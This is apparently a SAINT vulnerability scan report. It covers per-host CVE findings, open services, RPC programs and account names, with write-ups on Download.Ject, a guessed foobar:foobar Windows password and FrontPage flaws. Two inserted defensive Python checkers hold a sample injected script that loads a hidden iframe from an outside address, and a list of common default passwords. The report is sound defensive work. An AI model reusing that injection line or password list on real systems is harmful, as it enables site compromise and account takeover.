host3.domain.com | critical | possible format string vulnerability in tooltalk | RPC | CVE-2001-0717 | 10.0 | no
host3.domain.com | critical | possible input validation error in tooltalk | RPC | CVE-2002-0677 CVE-2002-0678 | 7.5 | no
host3.domain.com | critical | tooltalk version may be vulnerable to buffer overflow | RPC | CVE-1999-0003 CVE-1999-0693 CVE-2002-0679 | 10.0 | no
host3.domain.com | concern | Excessive finger information | Other | CVE-1999-0612 | | yes
host3.domain.com | concern | Solaris fingerd user list disclosure | Other | CVE-2001-1503 | 2.1 | yes
host3.domain.com | concern | Information from rusersd could help hacker | RPC | CVE-1999-0626 | | yes
host3.domain.com | concern | signal handling race condition in Sendmail | Mail | CVE-2001-1349 | 3.7 | yes
host3.domain.com | potential | possible vulnerability in dtlogin | Other | CVE-2004-0368 | 10.0 | no
host3.domain.com | potential | Possible globbing vulnerability in SunOS ftpd | File Transfer | CVE-2001-0249 | 10.0 | no
host3.domain.com | potential | KCMS server may be vulnerable | RPC | CVE-2003-0027 | 5.0 | no
host3.domain.com | potential | possible vulnerability in login | Login/Shell | CVE-2001-0797 | 10.0 | no
host3.domain.com | potential | chargen could be used in UDP bomb | Networking/SNMP | CVE-1999-0103 | 5.0 | no
host3.domain.com | potential | rlogin is enabled | Login/Shell | CVE-1999-0651 | 7.5 | no
host3.domain.com | potential | rshd is enabled | Login/Shell | CVE-1999-0651 | 7.5 | no
host3.domain.com | potential | rexec is enabled and could help attacker | Login/Shell | CVE-1999-0618 | 10.0 | no
host3.domain.com | potential | rpc.statd is enabled and may be vulnerable | RPC | CVE-1999-0018 CVE-1999-0019 CVE-1999-0210 CVE-1999-0493 CVE-2000-0666 | 10.0 | no
host3.domain.com | potential | Information from rstatd could help hacker | RPC | CVE-1999-0624 | | yes
host3.domain.com | potential | Sendmail command EXPN is enabled | Mail | CVE-1999-0531 | | yes
host3.domain.com | potential | Sendmail command VRFY is enabled | Mail | CVE-1999-0531 | | yes
host3.domain.com | potential | SMTP may be a mail relay | Mail | CVE-1999-0512 | 10.0 | no
host3.domain.com | potential | SNMP is enabled and may be vulnerable | Networking/SNMP | CVE-1999-0615 CVE-2002-0012 CVE-2002-0013 CVE-2002-0053 CVE-2002-0796 CVE-2002-0797 | 10.0 | no
host3.domain.com | potential | sunrpc services may be vulnerable | RPC | CVE-2002-0391 CVE-2003-0028 | 10.0 | no
host3.domain.com | potential | possible buffer overflow in telnetd telrcv | Login/Shell | CVE-2001-0554 | 10.0 | no
host3.domain.com | potential | Possible vulnerability in X font server | Other | CVE-2002-1317 | 7.5 | no
host3.domain.com | service | 4045/TCP | | | |
host3.domain.com | service | 6112/TCP | | | |
host3.domain.com | service | 7100/TCP | | | |
host3.domain.com | service | FTP | | | |
host3.domain.com | service | Finger | | | |
host3.domain.com | service | SMTP | | | |
host3.domain.com | service | SNMP | | | |
host3.domain.com | service | Telnet | | | |
host3.domain.com | service | X-0 (6000/TCP) | | | |
host3.domain.com | service | XDM (X login) | | | |
host3.domain.com | service | chargen (19/TCP) | | | |
host3.domain.com | service | chargen:UDP (19/UDP) | | | |
host3.domain.com | service | daytime (13/TCP) | | | |
host3.domain.com | service | daytime (13/UDP) | | | |
host3.domain.com | service | discard (9/TCP) | | | |
host3.domain.com | service | discard (9/UDP) | | | |
host3.domain.com | service | echo (7/TCP) | | | |
host3.domain.com | service | echo (7/UDP) | | | |
host3.domain.com | service | exec (512/TCP) | | | |
host3.domain.com | service | login (513/TCP) | | | |
host3.domain.com | service | name (42/UDP) | | | |
host3.domain.com | service | printer (515/TCP) | | | |
host3.domain.com | service | shell (514/TCP) | | | |
host3.domain.com | service | sunrpc (111/TCP) | | | |
host3.domain.com | service | sunrpc (111/UDP) | | | |
host3.domain.com | service | time (37/TCP) | | | |
host3.domain.com service time (37/UDP)        
host3.domain.com service uucp (540/TCP)        
host3.domain.com info RPC service: 100000-2 portmapper (111/tcp)        
host3.domain.com info RPC service: 100000-2 portmapper (111/udp)        
host3.domain.com info RPC service: 100000-3 portmapper (111/tcp)        
host3.domain.com info RPC service: 100000-3 portmapper (111/udp)        
host3.domain.com info RPC service: 100000-4 portmapper (111/tcp)        
host3.domain.com info RPC service: 100000-4 portmapper (111/udp)        
host3.domain.com info RPC service: 100001-2 rstatd (32778/udp)        
host3.domain.com info RPC service: 100001-3 rstatd (32778/udp)        
host3.domain.com info RPC service: 100001-4 rstatd (32778/udp)        
host3.domain.com info RPC service: 100002-2 rusersd (32772/tcp)        
host3.domain.com info RPC service: 100002-2 rusersd (32775/udp)        
host3.domain.com info RPC service: 100002-3 rusersd (32772/tcp)        
host3.domain.com info RPC service: 100002-3 rusersd (32775/udp)        
host3.domain.com info RPC service: 100008-1 walld (32777/udp)        
host3.domain.com info RPC service: 100011-1 rquotad (32774/udp)        
host3.domain.com info RPC service: 100012-1 sprayd (32776/udp)        
host3.domain.com info RPC service: 100021-1 nlockmgr (4045/tcp)        
host3.domain.com info RPC service: 100021-1 nlockmgr (4045/udp)        
host3.domain.com info RPC service: 100021-2 nlockmgr (4045/tcp)        
host3.domain.com info RPC service: 100021-2 nlockmgr (4045/udp)        
host3.domain.com info RPC service: 100021-3 nlockmgr (4045/tcp)        
host3.domain.com info RPC service: 100021-3 nlockmgr (4045/udp)        
host3.domain.com info RPC service: 100021-4 nlockmgr (4045/tcp)        
host3.domain.com info RPC service: 100021-4 nlockmgr (4045/udp)        
host3.domain.com info RPC service: 100024-1 status (32771/tcp)        
host3.domain.com info RPC service: 100024-1 status (32772/udp)        
host3.domain.com info RPC service: 100068-2 (32779/udp)        
host3.domain.com info RPC service: 100068-2 (33095/tcp)        
host3.domain.com info RPC service: 100068-3 (32779/udp)        
host3.domain.com info RPC service: 100068-3 (33095/tcp)        
host3.domain.com info RPC service: 100068-4 (32779/udp)        
host3.domain.com info RPC service: 100068-4 (33095/tcp)        
host3.domain.com info RPC service: 100068-5 (32779/udp)        
host3.domain.com info RPC service: 100068-5 (33095/tcp)        
host3.domain.com info RPC service: 100083-1 (32775/tcp)        
host3.domain.com info RPC service: 100221-1 (32773/tcp)        
host3.domain.com info RPC service: 100232-10 sadmind (32773/udp)        
host3.domain.com info RPC service: 100235-1 (32795/tcp)        
host3.domain.com info RPC service: 100249-1 (33065/tcp)        
host3.domain.com info RPC service: 100249-1 (33313/udp)        
host3.domain.com info RPC service: 300598-1 (33064/tcp)        
host3.domain.com info RPC service: 300598-1 (33312/udp)        
host3.domain.com info RPC service: 805306368-1 (33064/tcp)        
host3.domain.com info RPC service: 805306368-1 (33312/udp)        
host3.domain.com info User: bin        
host3.domain.com info User: foobar        
host3.domain.com info User: root        
host3.domain.com info User: smithrj        
host3.domain.com info User: sys        
host4.domain.com concern vulnerable Eudora version: 6.2 Mail     no
host4.domain.com concern vulnerability in Macromedia Flash Player: 8.0.22.0 Other CVE-2006-0024 5.1 no
host4.domain.com concern Internet Explorer Create Text Range code injection Windows OS CVE-2006-1185 CVE-2006-1186 CVE-2006-1188 CVE-2006-1189 CVE-2006-1190 CVE-2006-1191 CVE-2006-1192 CVE-2006-1245 CVE-2006-1359 CVE-2006-1388 10.0 no
host4.domain.com concern Internet Explorer JS stack overflow Windows OS CVE-2006-0753 CVE-2006-0830 7.5 no
host4.domain.com concern vulnerable iTunes version: 6 Other     no
host4.domain.com concern Microsoft Excel and Office routing slip vulnerabilities Windows OS CVE-2005-4131 CVE-2006-0009 CVE-2006-0028 CVE-2006-0029 CVE-2006-0030 CVE-2006-0031 6.8 no
host4.domain.com concern vulnerable Mozilla Thunderbird version: 0.7.2 Mail CVE-2004-0902 CVE-2004-0903 CVE-2004-0904 CVE-2004-0905 CVE-2004-0906 CVE-2004-0907 CVE-2004-0908 CVE-2004-0909 CVE-2004-1316 CVE-2005-0142 CVE-2005-0148 CVE-2005-0149 CVE-2005-0255 CVE-2005-0399 CVE-2005-0590 CVE-2005-0989 CVE-2005-1159 CVE-2005-1160 CVE-2005-1532 CVE-2005-2261 CVE-2005-2265 CVE-2005-2266 CVE-2005-2269 CVE-2005-2270 10.0 no
host4.domain.com concern vulnerable Mozilla Firefox version: 1.0.3 Web CVE-2005-1476 CVE-2005-1477 CVE-2005-1531 CVE-2005-1532 CVE-2005-1937 CVE-2005-2260 CVE-2005-2261 CVE-2005-2262 CVE-2005-2263 CVE-2005-2264 CVE-2005-2265 CVE-2005-2266 CVE-2005-2267 CVE-2005-2268 CVE-2005-2269 CVE-2005-2270 CVE-2005-2701 CVE-2005-2702 CVE-2005-2703 CVE-2005-2704 CVE-2005-2705 CVE-2005-2706 CVE-2005-2707 CVE-2005-2871 CVE-2005-2968 CVE-2005-3089 7.5 no
host4.domain.com concern vulnerable Mozilla version: 1.7.7 Web CVE-2005-1476 CVE-2005-1531 CVE-2005-1532 CVE-2005-1937 CVE-2005-2260 CVE-2005-2261 CVE-2005-2263 CVE-2005-2265 CVE-2005-2266 CVE-2005-2268 CVE-2005-2269 CVE-2005-2270 CVE-2005-2701 CVE-2005-2702 CVE-2005-2703 CVE-2005-2704 CVE-2005-2705 CVE-2005-2706 CVE-2005-2707 CVE-2005-2871 CVE-2005-2968 CVE-2005-4134 CVE-2006-0292 7.5 no
host4.domain.com concern vulnerable Netscape Navigator version: 4.78 Web CVE-2004-0718 CVE-2004-0722 CVE-2004-1160 CVE-2005-0399 CVE-2005-0989 CVE-2005-1156 CVE-2005-1157 CVE-2005-1160 10.0 no
host4.domain.com concern Outlook Express Windows Address Book vulnerability Mail CVE-2006-0014 5.1 no
host4.domain.com concern vulnerable QuickTime version: 7.0.3 Other CVE-2005-2340 CVE-2005-3707 CVE-2005-3708 CVE-2005-3709 CVE-2005-3710 CVE-2005-3711 CVE-2005-3713 CVE-2005-4092 CVE-2005-4128 7.5 no
host4.domain.com concern Sunncomm ActiveX control enabled Web     no
host4.domain.com concern vulnerable Winamp version: 5.13 Other CVE-2006-0708 CVE-2006-0720 9.3 no
host4.domain.com concern Windows Plug and Play vulnerability Windows OS CVE-2005-1983 10.0 no
host4.domain.com concern Run key allows write access Windows OS CVE-1999-0589 10.0 no
host4.domain.com concern Uninstall key allows write access Windows OS CVE-1999-0589 10.0 no
host4.domain.com concern HTML Help cross-domain vulnerability Windows OS CVE-2004-1043 5.0 no
host4.domain.com concern Microsoft Data Access Component vulnerability Windows OS CVE-2006-0003 5.1 no
host4.domain.com concern Windows Explorer COM object command execution Windows OS CVE-2004-2289 CVE-2006-0012 10.0 no
host4.domain.com potential Internet Explorer Shell.Explorer object enabled Windows OS CVE-2004-0985 10.0 no
host4.domain.com potential last user name shown in login box Windows OS CVE-1999-0592 10.0 no
host4.domain.com potential application uses vulnerable libpng version: Thunderbird 0.7.2 Other CVE-2004-0597 CVE-2004-0598 CVE-2004-0599 10.0 no
host4.domain.com potential Possible vulnerability in Microsoft UPnP Windows OS CVE-2001-0876 CVE-2001-0877 7.5 no
host4.domain.com potential Outlook Express NNTP buffer overflow Mail CVE-2005-1213 7.5 no
host4.domain.com potential Outlook Express default news server account disclosure Mail CVE-2005-2226 5.0 no
host4.domain.com potential User DoeJ has never logged in Windows OS     no
host4.domain.com potential User sainttest has never logged in Windows OS     yes
host4.domain.com potential weak maximum password age policy (730 days) Windows OS CVE-1999-0535 10.0 no
host4.domain.com potential weak minimum password age policy (0 days) Windows OS CVE-1999-0535 10.0 no
host4.domain.com potential weak password history policy (3) Windows OS CVE-1999-0535 10.0 no
host4.domain.com potential non-administrative users can act as part of the operating system Windows OS CVE-1999-0534 4.6 no
host4.domain.com potential non-administrative users can bypass traverse checking Windows OS CVE-1999-0534 4.6 no
host4.domain.com potential non-administrative users can create token object Windows OS CVE-1999-0534 4.6 no
host4.domain.com potential non-administrative users can replace a process level token Windows OS CVE-1999-0534 4.6 no
host4.domain.com potential Password never expires for user DoeJ Windows OS     no
host4.domain.com potential Password never expires for user foobars Windows OS     no
host4.domain.com potential Windows TCP/IP Stack not hardened Other CVE-2005-0688 CVE-2005-1649 5.0 no
host4.domain.com potential Jet Database Engine input validation problems Windows OS CVE-2005-0944 7.5 no
host4.domain.com service 1025/UDP        
host4.domain.com service 1026/UDP        
host4.domain.com service 1107/UDP        
host4.domain.com service 1118/UDP        
host4.domain.com service 1123/UDP        
host4.domain.com service 1129/UDP        
host4.domain.com service 1900/UDP        
host4.domain.com service SMB        
host4.domain.com service epmap (135/TCP)        
host4.domain.com service isakmp (500/UDP)        
host4.domain.com service microsoft-ds (445/TCP)        
host4.domain.com service microsoft-ds (445/UDP)        
host4.domain.com service netbios-dgm (138/UDP)        
host4.domain.com service netbios-ns (137/UDP)        
host4.domain.com service ntp (123/UDP)        
host4.domain.com info User: Administrator        
host4.domain.com info User: DoeJ        
host4.domain.com info User: Guest        
host4.domain.com info User: HelpAssistant        
host4.domain.com info User: HelpServicesGroup        
host4.domain.com info User: IME_ADMIN        
host4.domain.com info User: IME_USER        
host4.domain.com info User: SUPPORT_388945a0        
host4.domain.com info User: foobars        
host4.domain.com info User: sainttest        
host4.domain.com info Windows service: AhnLab Task Scheduler        
host4.domain.com info Windows service: Application Layer Gateway Service        
host4.domain.com info Windows service: Automatic Updates        
host4.domain.com info Windows service: COM+ Event System        
host4.domain.com info Windows service: Computer Browser        
host4.domain.com info Windows service: Creative Service for CDROM Access        
host4.domain.com info Windows service: Cryptographic Services        
host4.domain.com info Windows service: DCOM Server Process Launcher        
host4.domain.com info Windows service: DHCP Client        
host4.domain.com info Windows service: DNS Client        
host4.domain.com info Windows service: Distributed Link Tracking Client        
host4.domain.com info Windows service: Error Reporting Service        
host4.domain.com info Windows service: Event Log        
host4.domain.com info Windows service: Help and Support        
host4.domain.com info Windows service: IPSEC Services        
host4.domain.com info Windows service: Logical Disk Manager        
host4.domain.com info Windows service: McAfee Framework Service        
host4.domain.com info Windows service: Net Logon        
host4.domain.com info Windows service: Network Associates McShield        
host4.domain.com info Windows service: Network Associates Task Manager        
host4.domain.com info Windows service: Network Connections        
host4.domain.com info Windows service: Network Location Awareness (NLA)        
host4.domain.com info Windows service: Plug and Play        
host4.domain.com info Windows service: Print Spooler        
host4.domain.com info Windows service: Protected Storage        
host4.domain.com info Windows service: Remote Access Connection Manager        
host4.domain.com info Windows service: Remote Procedure Call (RPC)        
host4.domain.com info Windows service: Remote Procedure Call (RPC) Locator        
host4.domain.com info Windows service: Remote Registry        
host4.domain.com info Windows service: Removable Storage        
host4.domain.com info Windows service: SSDP Discovery Service        
host4.domain.com info Windows service: Secondary Logon        
host4.domain.com info Windows service: Security Accounts Manager        
host4.domain.com info Windows service: Server        
host4.domain.com info Windows service: Shell Hardware Detection        
host4.domain.com info Windows service: SysTrack Agent        
host4.domain.com info Windows service: System Event Notification        
host4.domain.com info Windows service: System Restore Service        
host4.domain.com info Windows service: TCP/IP NetBIOS Helper        
host4.domain.com info Windows service: Task Scheduler        
host4.domain.com info Windows service: Telephony        
host4.domain.com info Windows service: Terminal Services        
host4.domain.com info Windows service: Themes        
host4.domain.com info Windows service: WebClient        
host4.domain.com info Windows service: Windows Audio        
host4.domain.com info Windows service: Windows Firewall/Internet Connection Sharing (ICS)        
host4.domain.com info Windows service: Windows Management Instrumentation        
host4.domain.com info Windows service: Windows Time        
host4.domain.com info Windows service: Wireless Zero Configuration        
host4.domain.com info Windows service: Workstation        
host5.domain.com critical Anthill 0.1.6.1 is vulnerable Web CVE-2002-0548 CVE-2002-0549 7.5 no
host5.domain.com critical OpenSSH 3.1p1 may be vulnerable Login/Shell CVE-2002-0575 CVE-2002-0639 CVE-2002-0640 CVE-2003-0190 CVE-2003-0682 CVE-2003-0693 CVE-2003-0695 CVE-2005-2798 10.0 yes
host5.domain.com concern Web server allows cross-site tracing Web     yes
host5.domain.com concern vulnerable Horde Accounts version: 2.1 Web CVE-2005-1316 4.3 no
host5.domain.com concern vulnerable Horde Forwards version: 2.2 Web CVE-2005-1318 4.3 no
host5.domain.com concern vulnerable Horde Kronolith version: 1.1 Web CVE-2005-1314 4.3 no
host5.domain.com concern vulnerable Horde Mnemo version: 1.1 Web CVE-2005-1320 4.3 no
host5.domain.com concern vulnerable Horde Nag version: 1.1 Web CVE-2005-1322 4.3 no
host5.domain.com concern vulnerable Horde Passwd version: 2.2 Web CVE-2005-1313 4.3 no
host5.domain.com concern vulnerable Horde Turba version: 1.2 Web CVE-2005-1315 4.3 no
host5.domain.com concern vulnerable Horde Vacation version: 2.2 Web CVE-2005-1321 4.3 no
host5.domain.com concern vulnerable Horde IMP version: 3.2.1 Mail CVE-2004-0584 CVE-2004-1443 CVE-2005-1319 CVE-2005-4080 6.8 no
host5.domain.com concern vulnerable Horde version: 2.2.3 Web CVE-2003-0728 CVE-2005-0378 CVE-2005-0961 CVE-2005-3570 9.3 no
host5.domain.com potential possible vulnerability in wu-ftpd 2.6.2 File Transfer CVE-2003-0466 CVE-2004-0185 10.0 no
host5.domain.com potential possible vulnerability in OpenSSL 0.9.7d Other CVE-2005-2969 5.0 no
host5.domain.com potential possible RSA SecurID Web Agent redirect buffer overflow Other     yes
host5.domain.com potential possible heap overflow in RSA SecurID Web Agent Other CVE-2005-1471 CVE-2005-4734 7.5 no
host5.domain.com potential SSL server accepts SSLv2 protocol Other     no
host5.domain.com potential SSL server accepts weak ciphers Other     no
host5.domain.com potential TCP reset using approximate sequence number Other CVE-2004-0230 5.0 no
host5.domain.com service 1414/TCP        
host5.domain.com service 1515/TCP        
host5.domain.com service FTP        
host5.domain.com service SAINT        
host5.domain.com service SMTP        
host5.domain.com service SSH        
host5.domain.com service WWW        
host5.domain.com service WWW (Secure)        
host5.domain.com service WWW (non-standard port 81)        

3.0  Details

The following sections provide details on the specific vulnerabilities detected on each host.

3.1  host1.domain.com

IP Address: 172.16.0.1 Host type: Windows 2000 Service Pack 1
Scan time: Jun 29 14:31:35 2009 Netbios Name: HOST1


Download.Ject detected on web server
Severity: Critical Problem

Created 06/28/04

Impact

For web servers, a remote attacker has gained access to the server and added malicious content to the web site. For web clients, the web browser may have installed a keystroke logger when visiting a compromised web site. The keystroke logs are automatically sent to a remote web site.

Background

Download.Ject, also known as JS.Scob, employs a new two-phased attack technique, in which an attacker breaks into a vulnerable web server and installs code which in turn attacks visitors to the web site.

The Problem

Both servers and clients can be infected by Download.Ject. The problem begins with the server. An attacker breaks into a vulnerable Microsoft IIS web server and adds JavaScript code to the web site's footer.

The second part of the problem occurs when a client visits the compromised server using a vulnerable version of Microsoft Internet Explorer. The attacker's JavaScript code, which is appended to every web page, redirects the browser to an external address belonging to a remote attacker. The remote web page exploits the Internet Explorer Modal Dialog Zone Bypass vulnerability. This exploit runs the attack code which downloads and installs a keystroke logger onto the system by exploiting the Internet Explorer ADODB.Stream Object File Installation Weakness.

Once the keystroke logger is installed on the system, it attempts to collect login and password combinations and saves them locally in an HTML form. The form data is then uploaded to a number of remote sites.
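As an added illustration (not part of the SAINT tutorial or its check code), the script below looks for the server-side symptom described above: a script that is identical at the tail of every page and references a host other than the site itself. It runs over page bodies that have already been fetched; the three-page sample site, its host name and the address 203.0.113.10 are constructed for the example.

```python
"""Footer-injection check for the Download.Ject pattern: the same <script>
appended to every page, pointing at a host other than the site itself.
Added example; not SAINT's check.  Sample pages are constructed."""
import re
from os.path import commonprefix

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)
# Any host named inside a script block: a src= attribute or a literal URL in code.
HOST_RE = re.compile(r"(?:https?:)?//([A-Za-z0-9.-]+)", re.IGNORECASE)


def common_footer(pages):
    """Longest trailing string shared by all pages: the injected footer plus
    whatever closing markup the site already had."""
    return commonprefix([p[::-1] for p in pages])[::-1]


def external_script_hosts(html, site_host):
    """Hosts referenced from <script> blocks in html that are not site_host."""
    found = []
    for block in SCRIPT_RE.findall(html):
        for host in HOST_RE.findall(block):
            host = host.lower()
            if host != site_host.lower() and host not in found:
                found.append(host)
    return found


def find_footer_injection(pages, site_host):
    """External hosts referenced by script in the footer common to all pages,
    or [].  Needs at least two pages: with one page there is no way to
    separate the footer from the page's own content."""
    if len(pages) < 2:
        return []
    return external_script_hosts(common_footer(pages), site_host)


# Constructed sample site: a legitimate site-hosted footer script on every page
# and, for the infected set, an injected script that pulls an iframe from an
# outside address.  203.0.113.10 is a documentation address, not a real host.
SITE = "www.example.com"
LEGIT_FOOTER = f'<script src="//{SITE}/js/stats.js"></script>'
INJECTED = ("<script>document.write('<iframe src=\"http://203.0.113.10/x.htm\""
            " width=0 height=0></iframe>')</script>")


def make_page(title, body, injected=""):
    return (f"<html><head><title>{title}</title></head><body><h1>{title}</h1>"
            f"<p>{body}</p>{LEGIT_FOOTER}{injected}</body></html>")


CLEAN_PAGES = [make_page("Home", "Welcome"), make_page("About", "Who we are"),
               make_page("Contact", "Write to us")]
INFECTED_PAGES = [make_page("Home", "Welcome", INJECTED),
                  make_page("About", "Who we are", INJECTED),
                  make_page("Contact", "Write to us", INJECTED)]

if __name__ == "__main__":
    print("clean   :", find_footer_injection(CLEAN_PAGES, SITE))
    print("infected:", find_footer_injection(INFECTED_PAGES, SITE))
```

The common-suffix approach is deliberately blunt: it flags only content that is byte-identical on every page, which is exactly how an IIS document footer is applied, and it ignores legitimate site-hosted scripts. Pages that differ in trailing whitespace will shorten the footer it sees, so fetch them with the same client settings.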

Resolution

Run a virus scan and delete or repair any files infected with Download.Ject or JS.Scob. On IIS web servers, disable the document footer or ensure that the footer is valid in the Documents tab of the Web Site Properties.

To avoid becoming infected, install the fix for the Internet Explorer Modal Dialog Zone Bypass and ADODB.Stream Object File Installation vulnerabilities when available. Until the fix is installed, disable client-side scripting and active content in the Internet zone in Microsoft Internet Explorer.

Where can I read more about this?

For more information, see the advisories published by Microsoft and Symantec.

Technical Details

Service: http

Guessed password to windows account (foobar:foobar)
Severity: Critical Problem

Updated 06/15/07
CVE 1999-0501
CVE 1999-0502
CVE 1999-0503
CVE 1999-0504
CVE 1999-0505
CVE 1999-0506

Impact

An attacker who is able to guess the password to a user account could gain shell access to the system with the privileges of the user. From there it is often trivial to gain complete control of the system.

Background

Passwords are the most commonly used method of authenticating users to a server. The combination of a login name and password is used to verify the identity of a user requesting access, and to determine what parts of the server the user has permission to access.

The Problem

Administrators often set up new user accounts with no password or with a default password which is easy to guess. Additionally, some users may choose a simple password which is easy to remember. Null passwords and passwords that are very similar to the login name are an easy way for attackers to gain access to the system.

Related CVE entries:
CVE 2002-1629 Multi-Tech ProxyServer
CVE 2005-3595 Windows XP Home Edition
CVE 2007-3232 IBM Totalstorage DS400


Cisco 2700 Series Wireless Location Appliance Default Password

10/27/06
CVE 2006-5288
The Cisco 2700 Series Wireless Location appliance is an internet connectivity device. It is exposed to a default administrative password issue. Versions prior to 2.1.34 are affected.

Resolution

Protect all accounts with a password that cannot be guessed. Require users to choose passwords which are at least eight characters long, include numeric and non-alphanumeric characters, and are not based on the login name or any other personal information about the user. On Unix systems, enforce this policy using a utility such as npasswd in place of the default passwd program; on Windows systems, enforce it through the minimum length, complexity, history and maximum age settings of the account password policy in Local Security Policy or Group Policy. Check the strength of all account passwords periodically using a password cracking utility such as Crack for Unix.
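The following is an added example (not SAINT's check) that turns the policy in the resolution above into a checker, and separately reports the conditions that make a password guessable outright: null, equal to or derived from the login name, or a common default. The list of default passwords and the sample login/password pairs are constructed for the example; foobar:foobar is the pair the scan actually found.

```python
"""Guessable-password and password-policy checks.  Added example, not SAINT's
check; the default-password list is constructed for the example."""
import string

# Defaults an attacker tries before anything else (constructed list).
COMMON_DEFAULTS = {"password", "passw0rd", "admin", "administrator", "guest",
                   "changeme", "welcome", "letmein", "123456", "12345678", "qwerty"}

# Findings that mean the password can be guessed outright (the
# CVE-1999-0501 .. CVE-1999-0506 class), as opposed to merely failing policy.
GUESSABLE = {"null password", "same as login name", "based on login name",
             "common default password"}


def _letters(s):
    """Lower-case letters only, so 'Foobar1!' and 'foobar' compare equal."""
    return "".join(ch for ch in s.lower() if ch.isalpha())


def password_weaknesses(login, password):
    """Return the rules a (login, password) pair breaks; [] means it passes.
    Policy: at least eight characters, at least one digit and one
    non-alphanumeric character, and not based on the login name."""
    if password == "":
        return ["null password"]
    problems = []
    pw, user = password.lower(), login.lower()
    pw_core, user_core = _letters(password), _letters(login)
    if pw == user:
        problems.append("same as login name")
    elif user_core and (user_core in pw_core            # login name inside password
                        or pw_core == user_core[::-1]    # login name reversed
                        or (len(pw_core) >= 4 and pw_core in user_core)):
        problems.append("based on login name")
    if pw in COMMON_DEFAULTS:
        problems.append("common default password")
    if len(password) < 8:
        problems.append("shorter than eight characters")
    if not any(ch.isdigit() for ch in password):
        problems.append("no numeric character")
    if not any(ch in string.punctuation for ch in password):
        problems.append("no non-alphanumeric character")
    return problems


def is_guessable(login, password):
    """True when an attacker could get in by guessing, whatever the policy says."""
    return any(p in GUESSABLE for p in password_weaknesses(login, password))


if __name__ == "__main__":
    # Constructed pairs; foobar:foobar is the one the scan found.
    for login, pw in [("foobar", "foobar"), ("smithrj", ""), ("foobar", "Foobar1!"),
                      ("foobar", "raboof"), ("smithrj", "Tr0ub4dor&3")]:
        print(f"{login}:{pw!r:14} guessable={is_guessable(login, pw)} "
              f"{password_weaknesses(login, pw)}")
```

Note that Foobar1! satisfies every length and character-class rule and is still rejected, because a guesser that tries the login name with a capital, a digit and a symbol appended will find it; that is why the policy text lists "not based on the login name" as a separate requirement.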

For Cisco 2700 Series Wireless Location Appliance, change the password or mitigate as described in cisco-sa-20061013-wla.

Where can I read more about this?

Walter Belgers' paper, UNIX password security, is a good reference on strengthening passwords.

The Cisco 2700 Series WLA default password was described in cisco-sa-20061013-wla and Bugtraq ID 20490.

The IBM Totalstorage DS400 default password was posted to Full Disclosure.

Technical Details

Service: netbios-ssn
foobar:foobar

MS FrontPage Server Extension Vulnerability: /_vti_bin/shtml.dll
Severity: Critical Problem CVE: CVE-2003-0824

Updated 04/12/06

Impact

A remote attacker could take control of the web site, and possibly the system as well.

Background

Web servers which include Microsoft FrontPage Server Extensions have special accounts to authenticate web server administrators, web page authors, and web site visitors. The account names and encrypted passwords are stored in FrontPage password files in the /_vti_pvt directory. The password files are named service.pwd on Microsoft web servers, and administrators.pwd, authors.pwd, and users.pwd on Netscape web servers.

An integral feature of FrontPage Server Extensions is a remote debug capability. This functionality enables users to remotely connect to a server running FrontPage Server Extensions and remotely debug content using, for example, Visual InterDev.

FrontPage Server Extensions also come with the SmartHTML (WebBot) interpreter. This functionality is made up of a variety of dynamic link library files, and exists to support certain types of dynamic web content. Web developers may choose to insert a FrontPage WebBot (actually a specially formatted HTML comment) in a web page. When the FrontPage Editor saves the web page, a FrontPage Server Extensions application scans the page for embedded WebBot components and replaces them with the appropriate HTML text.

FrontPage Server Extensions can also include an optional subcomponent called Visual Studio Remote Application Deployment (RAD) support. This support allows Visual InterDev users to register objects on the web server.

The Problem


MS FrontPage Server Extensions cross-site scripting vulnerability

04/12/06
CVE 2006-0015
There is a cross-site scripting vulnerability that could allow an attacker to run client-side script on behalf of an FPSE user. Attempts to exploit this vulnerability require user interaction. An attacker who successfully exploited this vulnerability against an administrator could take complete control of a FrontPage Server Extensions 2002 server.


fp30reg.dll Remote Debug Buffer Overflow

11/19/03
CVE 2003-0822
There is a buffer overflow vulnerability in the remote debug functionality in fp30reg.dll of Microsoft FrontPage Server Extensions 2000 and 2002. This vulnerability allows remote attackers to execute arbitrary code via a carefully crafted chunked encoded request.


SmartHTML Denial of Service

11/19/03
CVE 2003-0824
A vulnerability in the SmartHTML interpreter (shtml.dll) could allow an attacker to temporarily consume all available CPU resources through malicious HTTP requests.


Buffer overflow in Visual Studio RAD support

CVE 2001-0341
Due to an unchecked buffer in the Visual Studio RAD sub-component of FrontPage Server Extensions, it could be possible for a remote attacker to execute arbitrary commands with IUSR_machinename privileges, or in some cases SYSTEM privileges. This vulnerability can only be exploited if the Visual Studio RAD sub-component is installed, which is not the case by default.


Password File Access

When a FrontPage password file is readable by an unprivileged web user, an attacker can retrieve it and crack the encrypted passwords to gain unauthorized access to the web site. If any users' FrontPage passwords are the same as their system passwords, the system could be compromised as well.


fpcount.exe buffer overflow

10/22/02
CVE 1999-1376
The fpcount.exe utility which is installed with FrontPage Server Extensions versions prior to 98 contains a remotely exploitable buffer overflow vulnerability.

Resolutions

To fix the FrontPage Server Extensions cross-site scripting vulnerability, apply the patch indicated in Microsoft Security Bulletin 06-017. To fix the fp30reg.dll remote debug buffer overflow and the SmartHTML denial of service, apply the patch indicated in Microsoft Security Bulletin 03-051.

To fix the vulnerability in the Visual Studio RAD support, apply the patch indicated in Microsoft Security Bulletin 01-035.

To secure the FrontPage password file, set the permissions on the file(s) to be more restrictive. The exact permissions which should be used are not specified. Use the most restrictive permissions possible without denying access to legitimate users.

On Windows NT systems:

  1. Find the file in Windows Explorer
  2. Click on the file with the right mouse button
  3. Select Properties
  4. Click on the Security Tab
  5. Click on the Permissions button
  6. Change or remove permissions on the file as necessary.
On Unix systems:
Use the chmod command.

To fix the buffer overflow in fpcount.exe, upgrade to FrontPage Server Extensions 98 or higher.

Where can I read more about this?

For more information on the Front Page Server Extensions cross-site scripting vulnerabilities see Microsoft Security Bulletin 06-017 and Bugtraq ID 17452.

For more information on the fp30reg.dll remote debug and SmartHTML buffer overflow vulnerabilities, see Microsoft Security Bulletin 03-051 and Secunia Advisory SA10195.

For more information on the vulnerability in the Visual Studio RAD support, see Microsoft Security Bulletin 01-035 and NSFOCUS Security Advisory 2001-03.

See the Rhino 9 Advisory for more information about the password file vulnerability.

The fpcount.exe vulnerability was posted to Bugtraq archive 11943.

Technical Details

Service: http
Sent:
POST /_vti_bin/shtml.dll HTTP/1.0
Host: host1.domain.com:80


Received:
HTTP/1.1 200 OK
And:
